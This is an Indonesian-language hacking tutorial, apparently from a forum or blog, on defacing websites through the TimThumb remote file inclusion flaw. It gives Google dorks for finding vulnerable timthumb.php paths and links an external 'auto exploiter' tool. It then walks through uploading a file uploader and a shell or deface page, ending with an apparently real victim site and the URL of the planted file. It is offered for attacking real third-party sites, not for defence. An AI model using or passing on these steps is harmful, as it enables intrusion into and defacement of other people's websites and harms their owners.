Tutorial Deface metode Timthumb RFI

 

Halo Ngab , Balik lagi dengan gw Arman1337, Kali ini gw akan Nge-share tutorial deface metode Timthumb RFI

Pertama-tama kita siapkan bahan-bahan nya dulu:v

Bahan ;

-Dork = 

"Administractor" inurl:/admin site:.com

"Administractor" inurl:/admin site:.vn

inurl:/admin/timthumb.php

inurl:/timthumb.php

-exploit =

/admin/timthumb.php

/timthumb.php

-sc depes kalian

-Tools Auto Exploiter Timthumb

 http://inasnacc.org/ojs2/public/site/images/oyons/tools/timthumb

-Kuota Internet

Ok gw rasa udh cukup sekarang kita ke tutorial nya:v

Pertama2 kalian ngedorking dulu di google

 

cari web vuln , lalu tambahkan Exploit admin/timthumb.php seperti ini

http://hte-jsc.com/admin/timthumb.php

Ciri - Ciri Vuln?

akan ada seperti ini

no image specified

Query String : 

TimThumb version : 1.19

Dia Vuln nya versi 1.15-1.30:v

Kalau udh langsung aja kita buka tools auto exploiter timthumb nya

Salin site beserta Exploit nya lalu paste di tools nya , seperti ini ;

Lalu Klik Exploit

Dan dia akan seperti ini ;

Cara manggil nya? , Salin semua tulisan yang ada di belakang public_html lalu paste di site nya

Berhasil up uploader nya, tinggal mau up SC or Shell, di sini gw cuma up file aja:v

Pilih file dan upload

Sucsess, Cara panggil nya? Klik tulisan yg Klik Di Sini:v

Done:v

My Result?

http://hte-jsc.com/admin/webroot/cache/ft.php

Oke sekian materi dari gw kurang lebih nya minta maaf:v

Gw akhiri assalamualaikum warahmatullahi wa barakatuh

#Thanks To All My Friends